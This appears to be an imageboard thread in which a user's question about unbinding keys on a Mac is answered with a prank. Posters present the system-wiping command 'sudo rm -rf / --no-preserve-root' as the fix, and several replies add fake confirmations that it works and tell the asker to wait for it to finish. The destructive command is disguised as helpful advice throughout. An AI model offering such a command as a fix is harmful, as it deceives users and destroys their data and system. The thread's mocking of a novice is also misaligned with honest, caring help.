I know there's a command for Mac (and I thought Windows) to unbind all keys, what was that /g?

I know there's a command for Mac (and I thought Windows) to unbind all keys, what was that /g?

just press these, in order

Command-space
Terminal [enter]
sudo rm -rf / --no-preserve-root
and then your password

Install Gentoo

this
just a lifesaver

thanks..

thanks, worked like a charm

doesnt work

You wrote it wrong.

>and no one heard of him again

Dumb frank poster

Dumb frank posters
ftfy

>using zsh
>implying this poster would fall for it

>know how replace default bash shell with zsh
>dont know what rm command does
u guys actually believe this??

He uses 4chin... he might be that stupid, yes.

rm -rf
not rf -rm

pic not related

thx bro, it works now.. how long do I need to wait... seems broken?? should I ctrl-c and start over

>zsh

what's the point on mac osx? the default login shell has so many of the good zsh features enabled by default

Just wait for a bit, it takes a while to complete.

I'm really intrigued about this command lol, how can it even finish when it tries to delete the system files which are necessary to run it??

The binary file for the command is already in your RAM, so it doesn't matter if you remove it from the hard disk.

It needs to remove old, used too many times files. So you can have the new ones.

>old files
not good for you

>clean and shiny files
good for you

I dont know who is more retared, you guys for trying to bait me, or me actually playing along this stupid game